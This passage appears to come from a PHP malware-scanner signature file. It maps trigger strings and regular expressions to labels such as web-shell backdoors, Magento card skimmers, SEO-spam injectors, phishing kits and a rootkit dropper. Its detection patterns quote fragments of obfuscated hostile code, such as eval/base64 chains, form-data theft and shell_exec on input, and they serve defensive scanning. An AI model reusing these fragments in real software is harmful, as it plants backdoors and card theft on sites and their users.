			'@$' => array(STR_TRIGGER,
				'(\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x28\x24\x76\x29);");' => array(STR_CLEARFILE, 'php.backdoor.filesman.046', NULL),
				'str_replace("{keyword}", $keyword, $html)' => array(STR_CLEARFILE, 'php.spam-seo.doorway_downloader.025', NULL),
			),
		),

		'\x2F\x2F".${"\x5F\x52\x45\x51\x55\x45\x53\x54"}[' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_file_get_contents.005', '\@(\/\*\*\/)?\s*[Ee][Vv][Aa][Ll]\1?\s*\(\@\1?[Ff][Ii][Ll][Ee]_[Gg][Ee][Tt]_[Cc][Oo][Nn][Tt][Ee][Nn][Tt][Ss]\1?\([\'"](?:.x68.x74.x74.x70|http)[^\$]+\${[\'"](?:.x5F.x52.x45.x51.x55.x45.x53.x54|_REQUEST)[\'"]}\s*\[[\'"][^\]]+]\)\)\s*;'),
		'(?i)@create_function\(..,"\};unset\(' => array(REX_CLEARFILE, 'php.backdoor.create_function.024', NULL),
	),

	'\x72\x65\x66\x65\x72\x72\x65\x72' => array(STR_TRIGGER,

			'\x75\x73\x65\x72\x41\x67\x65\x6E\x74' => array(STR_TRIGGER,
				'ip(hone|od|ad)' => array(STR_CLEAR_LINEMATCH, 'js.malware.injector.036', 'var\\s*(_0x\\d+)=\\[([\\\\x\\d\\w"\\\',]+)\\];function\\sisMobile[^\\0]+document\\[\\1\\[\\d+\\]\\]\\)\\+\\1\\[\\d+\\]\\+\\1\\[\\d+\\]\\)\\}'),
			),

			'$replace_routes = array(' => array(STR_CLEARFILE, 'php.spam-seo.redirect.047', NULL),
	),

	'echo $x' => array(STR_TRIGGER,

		'(\'*bot*\', $x' => array(STR_TRIGGER,
			'$_SERVER[\'HTTP_USER_AGENT\'];$x' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.injector.208', '\$x[\w]+="[^;]+";[\s]*\$x[^=]+[\s]*=[\s]*\$_SERVER\[.HTTP_USER_AGENT.\];[\s]*\$[^;]+";[\s]*if[\s]*\(\$x[^(]+\(.\*bot\*.,[\s]*\$x[^;]+;[\s]*\}[\s]*else[^;]+;\}'),
		),

		'error_reporting(0);$x' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.149', '(\$x[\w]+="[^"]+";[\s]*){5,}error_reporting\(0\);[^%]+(\$x[\w]+\(\$x[\w]+\(\$_REQUEST\["[^;]+\]\)\);|MCRYPT_MODE_ECB[^}]+return \$x[\w]+;[\s]*\}[\s]*\})'), //improved by PG to cover variants
	),

	'"\x63\x68\x72";' => array(STR_TRIGGER,
		'"\x69\x6e\x74\x76\x61\x6c";' => array(STR_TRIGGER,
			'include_once($' => array(STR_CLEAR_LINEMATCH, 'php.malware.include.023', '\$[\w]+[\s]*=[\s]*".x63.x68.x72";[\s]*\$[\w]+[\s]*=[\s]*".x69.x6e.x74.x76.x61.x6c";[^>]+include_once\(\$[\w]+\);'), 
			'die($' => array(STR_CLEAR_LINEMATCH, 'php.malware.include.023.02', '\$[\w]+[\s]*=[\s]*".x63.x68.x72";[\s]*\$[\w]+[\s]*=[\s]*".x69.x6e.x74.x76.x61.x6c";[^>]+x[\d]+"\)+;[\s]*}[\s]*die[^>]+x[\d]+"\)+;[\s]*}([\s]*\$[\w]+\(".x[^}]+[}\s]+)?'),
		),
	),

	'sojson' => array(STR_TRIGGER,
		']["\x66\x69\x6c\x74\x65\x72"]["\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72"]((([\'sojson' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.redirect.050', '\[.sojson\.[^\]]+\]\[..x...x...x...x[^}]+,\}[^\(]+\(.sojson[^\)]+\);'),
		'var __encode' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.redirect.050.02', 'var __encode[\s]*=[\s]*.sojson[^\}]+\}\)\(window\);'),
	),

	'= get_data("$' => array(STR_TRIGGER,
		'(\'display_errors\', \'0\');$' => array(STR_TRIGGER,
			'(array(\'http\' => array(\'timeout\' => 10,\'method\' => \'POST\')));$' => array(STR_TRIGGER,
				'(\'#<a href(.*)</a>#\', "$' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.178', '(\\$[\\w]+="[^"]+";[\\s]*){10,}@\\$[\\w]+..display_errors.,[\\s]*.0.\\);[\\s]*\\$[\\w]+..gcache[^>]+=> array..timeout[^<]+#<a[^}]+}[^}]+}[^}]+return \\$[\\w]+;}'),
			),
		),
	),

	')--><script type="text/javascript">var' => array(STR_TRIGGER,
		';if(navigator[appVersion_var].indexOf("MSIE' => array(STR_TRIGGER,
			'style.position="absolute"' => array(STR_TRIGGER,
				'<iframe name="\'+' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.injector.042', '<!--\\([\\w]+\\)--><script type="text.javascript">var[^>]+<iframe name=".\\+[^<]+style.position="absolute"[^<]+<.script><!--\\(.[\\w]+\\)-->'),
			),
		),
	),

	')+1);break;}}}return$' => array(STR_TRIGGER,
		'$stringpath =' => array(STR_TRIGGER,
			'$locationRole =' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.195', '\$locationpre[\s]*=[^;]+;[\s]*\$asp[\s]*=[^;]+;[\s]*\$val[\s]*=[^;]+;[\s]*\$stringpath[\s]*=[^;]+;[\s]*\$locationRole[\s]*=[\s]*\'[^\']+\';[\s]*\$meta[^;]+;[\s]*\$[\w]+[\s]*=[\s]*"[^~]+\);break;}}}return\$[\w]+;}'), 
		),
	),

	'= strrev("\x' => array(STR_TRIGGER,
		'" . implode("", array(' => array(STR_TRIGGER,
			'strrev("\x65" . "\x63" . "\x61" . "\x6c"' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.generic.028', '\\$[\\w]+[\\s]*=[\\s]array\\(([\'"][^,]+[\'"],[\\s]*){10}[^;]+;[\\s]*\\$[\\w]+[\\s]*=[\\s]*strrev\\(([\'"].x[\\da-fA-F]+[\'"][\\s]*\\.[\\s]){8}[^;]+;[^;]+implode[^;]+\\)\\)\\)[\'"],[\\s]*[\'"]{2}\\);'),
		),
	),

	'\x64\x6F\x63\x75\x6D\x65\x6E\x74' => array(STR_TRIGGER,
		'$(\'.MenuTrigger\');' => array(STR_WHITE,
			'"\x5C\x77\x2B","\x5C\x62","\x67"];eval(function(' => array(STR_CLEAR_LINEMATCH, 'js.malware.magento-cc-stealer.013', 'var _+[0O]x[\w]+=\[".x...x...x...x[^;]+\];[\s]*eval\([\s]*function[^\n]+\{\}\)\);?'),
		),
	),

	'if[\s]*\([\s]*![\s]*function_exists\([^)]+\)\)[\s]*\{[\s]*function [\w]+\(\$content\)' => array(REX_TRIGGER,
		'\x70\157\x73\151\164\x69\x6f\x6e\72\141\x62\x73' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.theme_link_spam.004', 'if[\s]*\([\s]*![\s]*function_exists\([^)]+\)\)[\s]*\{[\s]*function [\w]+\(\$content\)[\s]*\{[\s]*if[\s]*\(is_user_logged_in\(\)\)\{return \$content;\}[\s]*else[\s]*\{[\s]*if\(is_page\(\)\|\|is_single\(\)\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*"[^"]+.x[a-f0-9]{2}[^"]+";[^}]+} else[^,]+add_filter\([^;]+\);[\s]*\}'),
	),

	'\x3c\144\151\x76\40\163' => array(STR_TRIGGER,
		'else {if(is_page()||is_single()){' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injection.097', 'if\(\s!\s*function_exists\(.(\w+).\)\)\{\s*function\s*\1\((\$\w+)\)\s*\{\s*if\s*\(is_user_logged_in\(\)\)\{return\s*\2;\}\s*else\s*\{if\(is_page\(\)\|\|is_single\(\)\)\{\s*(\$\w+)\s=\s..x3c.144.151.x76.40.163[^;]+;\s*(\$\w+)[^;]+;\s*(\$\w+)\s*=\s*\3\s*\.\s*\2\s*\.\s*\4;\s*\}\s*else\s*\{\s*\5\s*=\s\2[^\(]+\([^,]+,\s*.\1.\);\}'),
	),

	'\x28\x65\x74\x61\x6c\x66\x6e\x69\x7a\x67\x28\x6c\x61\x76\x65' => array(STR_TRIGGER,
		'].@$_[' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.ip_check.001', '\$\_\=..x61.x62.x63.x64.x65.x66[^\;]+;\s*\$\w+\=[^;]+\;\$\w+\=[^;]+\;\s*\@\$\w+\([^\)]+\)\,\s*\$\w+\(..x28.x65.x64.x6f.x63.x65.x64.x5f.x34.x36.x65.x73.x61.x62.x28.x65.x74.x61.x6c.x66.x6e.x69.x7a.x67.x28.x6c.x61.x76.x65.\)[^\)]+\)\;'),
	),

	'].$GLOBALS[' => array(STR_TRIGGER,
		'echo @$GLOBALS[$GLOBALS[' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.037', NULL), 
	),

	'style="position: absolute; top: -' => array(STR_TRIGGER,
		'+="\x' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.pseudo-darkleech.003', '<div id="[\\w]+" style="position:[\\s]*absolute;[\\s]*top:[\\s]*-[\\d]+px;[\\s]*left:[\\s]*-[\\d]+px">[^<]+<.div>[\\s]*<div id="[\\w]+" style="position:[\\s]*absolute;[\\s]*top:[\\s]*-[\\d]+px;[\\s]*left:[\\s]*-[\\d]+px">[\\d\\s]+<.div>[\\s]*<script>[\\s]*((var [\\w]+[\\s]*=[\\s]*"\\\\x[^"]+";[\\s]*)|([\\w]+[\\s]*\\+=[\\s]*"\\\\x[^"]+";[\\s]*)){10,}[^<]+<.script>'),
	),

	'<?php @include("\x' => array(STR_TRIGGER,
		'\x2e\x6a\x70\x67");' => array(STR_CLEAR_LINEMATCH, 'php.malware.injector.034', '\@include\("\\\x[^"]+x2e.x6a.x70.x67"\);'),
	),

	'function the_end(){' => array(STR_TRIGGER,
		'public $door_url = "\\' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.doorway_downloader.016', 'if\\(!class_exists\\(\'eincode\'\\)\\) \\{[]\\s]*@ini_set\\(\'display_errors\', NULL\\);[^>]+public \\$door_url = \"[^%]+function rwcontent[^^]+\\$eincode = new eincode..ruri.;[\\s]*}'),
	),

	'<?php echo(base64_decode("' => array(STR_TRIGGER,
		'"));echo "\x' => array(STR_CLEARFILE, 'php.phishing.generic.034.03', NULL),
	),

	'<body onload="location[_0x' => array(STR_TRIGGER,
		'=["\x72\x65\x70\x6C\x61\x63\x65"];' => array(STR_CLEARFILE, 'php.spam-seo.redirect.055', NULL),
	),

	'"; create_function(\'\', "' => array(STR_TRIGGER,
		'$cookey' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_POST.111', '\$cookey[\s]*=[\s]*"[^"]+";[\s]*create_function\(..,[\s]*"[^;]+\);'),
	),

	'require_once' => array(STR_TRIGGER,
		'$host=bin2hex($_SERVER["' => array(STR_CLEARFILE, 'php.spam-seo.redirect.060', NULL),
	),

	'\x65";print($' => array(STR_TRIGGER,
		'PHNjcmlwdCB0' => array(STR_CLEAR_MULTIMATCH, 'php.malware.base64.028', '<\?php\s*(\$\w+)\s*=\s*[^;]+;print\(\1\("PHNjcmlwdCB0[^"]+"\)\);\?>'),
	),

	'@$wordpress($wp[' => array(STR_TRIGGER,
		'$wp="abcdefghijklmnopqrstuvwxyz(*_;/.)";' => array(STR_CLEARFILE, 'php.backdoor.wp-uploader.002', NULL),
	),

	' ^ ' => array(STR_TRIGGER, 
		'\^[\s]*".x[^;]+;[\s]*\$[\w]+\(\$[\w]+,[\s]*".x' => array(REX_CLEAR_MULTIMATCH, 'rex.xor_data.004', '<\?php[\s]*(\/\*[\w\s]+\*\/[\s]*)?(\$[\w\s]+=[\s]*"[^"]+"[\s]*\^[\s]*".x[^"]+"[\s]*;[\s]*){1,}\$[\w\s]+\([\s]*\$[\w\s]+,[\s]*".x[^\^]+"[\s]*\^[\s]*".x[^"]+",[\s]*"[\w\s]*"[\s]*\);(\/\/[\w]+)?[\s]*\?>'),
	),

	'\x63\x61\x6c\x6c\x5f\x75\x73\x65\x72\x5f\x66\x75\x6e\x63' => array(STR_TRIGGER,
		'\x7a\x69\x6e\x66\x6c\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x28\x27$' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.080', NULL),
	),

	'="\x70\x72".chr(101).chr(103)' => array(STR_TRIGGER,
		'if(isset($_GET[\'pwd\'])) {' => array(STR_CLEARFILE, 'php.backdoor.filesman.032', NULL),
	),

	'window["\x65\x76\x61\x6c"](' => array(STR_TRIGGER,
		'="\x31\x30\x31\x2c\x31\x31\x38\x2c\x39\x37\x2c\x31\x30\x38' => array(STR_CLEAR_MULTIMATCH, 'js.malware.redirect_gaid.001', '(\w)=".x31.x30.x31.x2c.x31.x31.x38[^"]+"\s\1=window...x65.x76.x61[^;\[]+;window...x65.x76.x61.x6c..\(\1\);'),
	),

	'${${"' => array(STR_TRIGGER,
		'}=base64_decode(base64_decode(' => array(STR_CLEAR_LINEMATCH, 'php.malware.obfuscated.002.02', '\$\{.(.x\w+){3,6}.\}\[.(.x\w+){4,11}.\][^\^]+\}=base64_decode\(base64_decode\([^\^]+\};break;\}\}\}'),
	),

	'="\x5f\x43\x4f\x4f\x4b\x49E";$' => array(STR_TRIGGER,
		'"\x63\x72\x65a\x74\x65_\x66\x75\x6e\x63\x74\x69\x6f\x6e"' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.COOKIE_eval.010', '\$\w+=..x5f.x43.x4f.x4f.x4b.x49[^\}]+.x65x.x74.x72.x61.x63.x74[^\}]+;\$\w+\(\);\}'),
	),

	'\x70\157\x73\151\164\x69\x6f\x6e\72\141\x62\x73\x6f\154\165\164\145' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.theme_link_spam.004.02', 'function [\w]+\(\$content\)[\s]*\{[\s]*if[\s]*\(is_user_logged_in\(\)\)\{return \$content;\}[\s]*else[\s]*\{[\s]*if\(is_page\(\)\|\|is_single\(\)\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*"[^"]+.x[a-f0-9]{2}[^"]+";[^}]+} else[^,]+add_filter\([^;]+\);'),
	'"\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x65\x62\x2E\x73\x74\x61\x74\x69\x2E\x62\x69\x64' => array(STR_CLEAR_LINEMATCH, 'js.malware.cryptominer.014', '<script>[\s]*var[\s]*_0x[\w]+=\[..x73.x63.x72.x69.x70.x74",".x63.x72.x65.x61.x74.x65[^;]+\];[^<]+<.script>'),
	'\x3c\x53\x43\x52\x49\x50\x54' => array(STR_CLEAR_MULTIMATCH, 'js.malware.unwanted-ads.006', '<[Ss]cript\slanguage=.javascript.>\s*<\!--\s*window\[..x64.x6f.x63.x75.x6d.x65.x6e.x74.\][^\(]+\(..x3c.x53.x43.x52[^\)]+\);\s*-->\s*<.[Ss]cript>'),
	' = "\x70\x61\x63\x6b";' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.028', 'function [\w]+\(\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*error_reporting\(0\);[^>]+error_reporting\(\$[\w]+\);[\s}]+'),
	'HhhPD4v="\x75s\x65\x72i\x64A081\x37\x46B25' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.injector.012', '/\*\s*\w+\s*\*/var\s*HhhPD4v="\\x75s\\x65\\x72i\\x64A081\\x37\\x46B25"[^>]+scro\\x6cl\\x69ng\\x3d\\x27n[^*]+Math.floor.Math.random...4294967295[^\*]+;/\*[^\*]+\*/'),
	'="\x65v\x61l(\x62a\x73\x6564_d\x65\x63\x6fde(\x27";' => array(STR_CLEARFILE, 'php.spam-seo.generic.011', NULL),
	'["\x69\x6e\x6e\x65\x72\x48\x54\x4d\x4c"]="\x3c\x69\x66\x72\x61\x6d\x65 \x66\x72\x61\x6d\x65' => array(STR_CLEARFILE, 'js.spam-seo.iframe-doorway.001', NULL),
	'<script>window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.injector.013', '<script>window...x64.x6f.x63.x75.x6d.x65.x6e.x74"..".x77.x72.x69.x74.x65[^>]+x25.x33.x42...;<.script>'),
	'"\x72\x65\x66\x65\x72\x72\x65\x72"];if(' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.injector.017', 'var [\w]+[\s]*=[\s]*([^;]+aol\|google[^;]+;[\s]*var [\w]+[\s]*=)?window\[..x...x...x[^\n]+\}'),
	'return(String["\x66\x72\x6f\x6d\x43"+' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.hidden-iframe.006','<script>\\(function.[\\w]+.\\{var [\\w]+=function.[\\w]+.\\{return [\\w]+\\[".x74.x6f.x53.x74.x72"\\+".*;return.String.".x66.x72.x6f.x6d.x43"\\+[^<]+<.script>'),
	'\x77\x3A\x2F\x2F\x74\x2E\x75\x2E\x6C\x2E\x76\x2F\x73\x2E\x72\x3F\x71\x3D' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.redirect.002','var\s*_0x\w{4,}...(.x\w\w){20,}[^;]+;eval[^;]+toString[^\n]+RegExp[^\{]+\{\}\)\);'),
	'= "\x65\x76al(\x67\x7a\x69nf\x6ca\x74e(b\x61se6\x34\x5f\x64\x65cod\x65(\x27";' => array(STR_CLEARFILE, 'php.backdoor.webshell_gen.053', NULL),
	'<title>w4l3XzY3 Mailer</' => array(STR_CLEARFILE, 'php.mailer.w4l3XzY3_mailer.001', NULL),
	'gads.src = \'\x68\x74\x74\x70' => array(STR_CLEAR_MULTIMATCH, 'js.malware.gads.001', 'var DomLoaded[\s]*=[\s]*\{[\s]*onload:[^x]+gads\.type[^;]+;[\s]*gads\.src[^\}]+\}\);'),
	'jQuery(window)[_0xd' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.injector.001', 'var._0x\w{3,}=...x3C.x64.x69.x76.x20.x63.x6C.x61[^;]+;jQuery.window.._0x\w{3,}[^;]+_0x\w{3,}....;.[^;]+;'),
	'"\x67\x65\x74\x44\x61\x74\x65","\x73\x65\x74\x44\x61\x74\x65","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D"' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.injector.025', '\\/\\*[\\w]{20,}\\*.[\\s]*var\\s*_.x[\\w]+=\\[\".x...x...x...x...[^\\]]+\\];[^\\*]+\\);(\\};)+[\\s]*.\\*[\\w]{20,}\\*.'),
	'JGxvZyA9ICdwcnQnOyBpZiAoIWlzc2V0KCRfU0VTU0lPTi' => array(STR_CLEARFILE, 'php.backdoor.eval_POST.032', NULL),
	'($_SERVER[\'SERVER_NAME\'])."\046\x69\075".$x' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.141', '\\$x0\\w=[^;]+;[\\s]*\\$x0\\w=[^;]+;[\\s]*\\$x0\\w=[^;]+;[\\s]*echo \\$x0[^;]+\\$_SERVER..SERVER_NAME[^;]+_SERVER..REMOTE_ADDR[^;]+;'), 
	'\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x70\x70\x6C\x65\x69\x64\x2E\x61\x70\x70\x6C\x65\x2E\x63\x6F\x6D\x2F\x67\x6C\x6F\x62\x61\x6C\x2F\x73\x63\x72\x69\x70\x74\x73\x2F\x6C\x69\x62\x2F\x70\x72\x6F\x74\x6F\x74\x79\x70\x65\x2E\x6A\x73' => array(STR_CLEARFILE, 'html.phishing.apple.003', NULL),
	'"\x23\x67\x74\x77\x79","\x64\x6F\x6E\x65","\x63\x6F\x6E\x6E\x65\x63\x74\x2E\x70\x68\x70",' => array(STR_CLEARFILE, 'js.phishing.generic.002', NULL),
	'$so32 = "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00' => array(STR_CLEARFILE, 'php.dropper.linux-rootkit.001', NULL),
	'\x2f\x63\x68\x65\x63\x6b\x2d\x66\x6c\x61\x73\x68\x2d\x75\x70\x64\x61\x74\x65\x2f\x22\x20\x73\x74\x79\x6c\x65\x3d\x22\x68\x65\x69\x67' => array(STR_CLEAR_LINEMATCH, 'js.spam-seo.injector.030', 'var [\\w]+=\\[\'\',\'.x3c.x69.x66.x72.x61.x6d.x65.x20.x73.x72[^#]+;document\\[[^;]+;}[^#]+;document\\[[^;]+;}[^#]+;document\\[[^;]+;}'),
	'$Class_WP_Index3($Class_WP_Index' => array(STR_CLEARFILE, 'php.backdoor.class_wp_index.001', NULL),
	'"\x47\x45\x54","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x73\x63\x72\x69\x70\x74\x62\x2E\x63\x6F\x6D\x2F' => array(STR_CLEAR_LINEMATCH, 'js.malware.magento-cc-stealer.016', 'window.addEventListener."[\\w]+",function...var [\\w]+=document.getElementById..[\\w]+..;[\\s]*[\\w]+.onsubmit=function...var[\\s]*_0x[\\w]+....x[\\d]+.x[^}]+[\\d]+]]\\(\\);}}\\);'),
	'["\x69\x64"]=\'\x6d\x5f\x67\x5f\x61\'' => array(STR_CLEAR_LINEMATCH, 'js.malware.cryptominer.021', 'var \w+=\s*window\[\".x64.x6f.x63[^;]+\)\[0\];\s*var (\w+)\s*=\s*window\[..x64[^;]+;\s*\1\[[^;]+;\s*\1\[..x69.x64.\]=[^;]+;\1[^;]+;\s*\w+\[[^;(]+\]\(\1\);'),
	'@$Hello_Dolly="' => array(STR_CLEARFILE, 'php.malware.hello_dolly.001', NULL),
	'JF9QT1NUWydiaWxsaW5nX2ZpcnN0X25hbWUnX' => array(STR_CLEARFILE, 'php.phishing.generic.037', NULL),
	'\$[\w]+=[\'"][^\'"]{5000}[^\'"]+[\'"];[\s]*(\$[\w]+\.?="[^"]+";[\s]*){10,}' => array(REX_CLEAR_MULTIMATCH, 'rex.backdoor.WSO.009', '\$[\w]+=[\'"][^\'"]{5000}[^\'"]+[\'"];[\s]*(\$[\w]+\.?="[^"]+";[\s]*){10,}@?(if\([\s]*function_exists[^\}]+\}[\s]*else[\s]*\{[\s]*@?)?\$[\w]+\(\$[\w]+\(\$[^;]+\);[\s]*(exit[^;]*;|\}[\s]*;)?'),
	'\x76\x69\x67\x6C\x69\x6E\x6B\x7C\x6A\x73\x7C\x63\x6F\x6D\x7C\x73\x63\x72\x69\x70\x74\x7C\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65' => array(STR_CLEAR_MULTIMATCH, 'js.spam-seo.injector.062', '<script type="text.javascript">[\s]*var _0x[\w]+=\[".x[^;]+.x76.x69.x67.x6C.x69.x6E.x6B.x7C.x6A.x73[^>]+\{\}\)\)[\s]*<.script>'),
	'<\?php[\s]*\$\{"(G|.x47)(L|.x4c)(O|.x4f)(B|.x42)(A|.x41)(L|.x4c)(S|.x53)"\}\["[^"]+"\]="[^;]+;[\s]*\$\{[^\n]+[\s]*\?>[\s]*<\?' => array(REX_CLEAR_MULTIMATCH, 'php.malware.GLOBALS.009', '<\?php[\s]*\$\{"(G|.x47)(L|.x4c)(O|.x4f)(B|.x42)(A|.x41)(L|.x4c)(S|.x53)"\}\["[^"]+"\]="[^;]+;[\s]*\$\{[^\n]+[\s]*\?>'),
	'<\?php[\s]*\$[\w]+[\s]*=[\s]*[\'"][^;]{1000,};[\s]*\$[\w]+[\s]*=[\s][\'"][preglac_\'"\s\.]{15,};' => array(REX_CLEARFILE, 'php.malware.obfuscated.043', NULL),
	'=window;"));/*' => array(STR_CLEAR_LINEMATCH, 'js.malware.eval_hex.004', '(\/\*\w+\*\/);window(\[..x\w+[^\]]+x\w+.\]){2}=\[.(.x\w+)[^;]+;var\s*(\w+=){1,}window[^\*]+\],\w+=window;.\)\);\1'),
	'@$_("eva' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.redirect.003.02', '(:?\$_ = "[^"]+"; )?@\$_\("eva[^; ]*"\);'),
),

'Mage' => array(STR_TRIGGER,

	' * @package  ' => array(STR_TRIGGER,

		' * @category   Mage' => array(STR_TRIGGER,

			'mail(' => array(STR_TRIGGER,
				'$message.= "Client IP : ".$_SERVER[\'REMOTE_ADDR\']."\n";' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-login-stealer.001', '\$ip\s*=\s*getenv\("REMOTE_ADDR"\);[^\}]+\$message\.=\s*.Client IP[^\}]+mail\([^;]+header\);'),
				'$pay.base64_decode($_COOKIE[\'__bill\']));' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.068', 'set_time_limit\(360\);\s*?if\s*?\(\s*?isset\s*?\(\s*?\$_\w+?\[.billing.\]\s*?\)\s*?\)\s*?\{\s*?\$bill\s*?=[^\}]+?\}\s*?;?\s*?if\s*?\(\s*?isset\s*?\(\s*?\$_\w+?\[.payment.\]\s*?\)\s*?\)\s*?\{\s*?if[^\|]+?\|[^_]+?_\w+?\[.payment.\][^;]+?;\s*?mail\s*?\((?:[^,]+?,){2}\$pay\.base64_decode\(\$_COOKIE\[\'__bill\'\]\)\);\s*?\}\s*?\};?'),
			),

			'urlencode(base64_encode(' => array(STR_TRIGGER,
				'gzdeflate(serialize' => array(STR_TRIGGER,
					'@$_REQUEST[\'payment\'][\'cc_number\']' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.058', 'if\(@\$_REQUEST\[.payment.\]\[.cc_number.\]\!\s*=\s*..\s*\|\|\s*@\$_REQUEST\[.login.\]\s*\[.password.\]\!\s*=\s*..\)\s*\{\s*\$\w+\s*\=[^\$]+\$\w+\s*\=\s*\$\w+->getBillingAddress\(\);\s*\$\w+\[.\w+.\]\s*\=\s*\$\w+->getData\(\)\;\s*\$\w+\s*\=\s*gzdeflate\(serialize\(\$\w+\)[^\@]+\@file_get_contents\([^\}]+base64_encode\(\$\w+\)\)\)\)\)\);\s*\}'),
				),
			),

			'getcwd(' => array(STR_TRIGGER,
				'/app/code/core/Mage' => array(STR_TRIGGER,
					'"base"."64"."_"."de"."code"' => array(STR_CLEARFILE, 'php.hacktool.magento-data-stealer.005', NULL),
				),
			),

			'base64_encode(serialize' => array(STR_TRIGGER,
				'$_SERVER[\'REQUEST_URI\'],"onestepcheckout")!==FALSE && $_POST["billing"]' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.061', 'error_reporting\(0\);\s*if\(stristr\(\$_SERVER\[.REQUEST_URI.\],.onestepcheckout.\)\!==FALSE\s*&&\s*\$_POST\[.billing.\]\){\s*setcookie\([^,]+,\s*base64_encode\(serialize\(\$_POST\[.billing.\]\)\),\s*time\(\)\+\d+[^;]+;\s*\}\s*if\(stristr\(\$_SERVER\[.REQUEST_URI.\],.realex[^\{]+\{\s*header\(.Location:[^\)]+\);\s*exit\(\);\s*\}'),
			),

			'move_uploaded_file($_FILES["fileToUpload"]' => array(STR_TRIGGER,
				'if(isset($_POST["s"])) { $target_file = basename($_FILES["fileToUpload' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.magento-uploader.001.02', 'if\(isset.._POST..\w.... \{ .target_file = basename.._FILES..fileToUpload[^\}]+?_file\);\s*\}'),
			),
		),

		'* @package     Mage_Checkout' => array(STR_TRIGGER,
			'eval(gzinflate(base64_decode(str_rot13(strrev(' => array(STR_CLEAR_LINEMATCH, 'php.malware.magento-cc-stealer.029', 'eval\(gzinflate\(base64_decode\(str_rot13\(strrev\([^;]+\);'),
			'\'content\' => @http_build_query($' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.093', '\$[\w]+[\s]*=[\s]*(\'[\S]+\')*;[\s]*\$[\w]+[\s]*=[\s]*array\([^-\)]+->getOnepage\(\)->[^\/]+application\/x-www-form-urlencoded[^@]+@http_build_query\(\$[\w]+\),[^@]+@stream_context_create\(\$[\w]+\);[^\}]+ini_set\(.default.socket_timeout.,[\s]*\$[\w]*\);'),
			'Mage::getModel("admin/roles")' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-login-stealer.013', 'public[\s]*function[\s]*[\w]+\(\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*Mage::getConfig\(\)->getResourceConnectionConfig\(.[\w]+.\);[^\{]+if\(!empty\(\$_GET\[.[\w]*.\]\)\)\{[\s]*define\([^\{]+\{[\s]*echo[^\{]+try[\s]*\{[\s]*[^\$]+\$[\w]+[\s]*=[\s]*Mage::getModel\(.admin\/user.\)[\s]*->setData\(array\([^;]+\)\)->save\(\);[\s]*\}[\s]*catch[\s]*\([^\}]+\}[\s]*try[\s]*\{[^\}]+\}[\s]*catch[\s]*\(Mage_Core_Exception[\s]*\$[\w]*\)[\s]*\{[\s]*echo[\s]*\$[\w]*->getMessage\(\);[\s]*exit;[^>]+\$user->setRoleIds\(array\([^;]+saveRelations\(\);[^>]+->getMessage\(\);[\s]*exit;[\s]*\}[\s]*echo[\s]*.([\w]+[\s]*)*..;[\s]*die\(..\);[\s]*\}[\s]*\}'),
		),

		'if(md5($password)' => array(STR_TRIGGER,
			'date(\'h:i:s a m/d/Y\', time());' => array(STR_TRIGGER,
				'Mage::getSingleton(\'adminhtml/url\')->getUrl(\'adminhtml\');' => array(STR_CHAIN_TRIGGER,
					'shell_exec($username); echo' => array(STR_CLEAR_MULTIMATCH, 'php.malware.magento-cc-stealer.109', '\(md5\(\$password\)[\s]*=+[\s]*[\'"][^\{]+[\'"]\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*shell_exec\(\$username\);[\s]*echo[^;]+;[\s]*\}[\s]*elseif'),
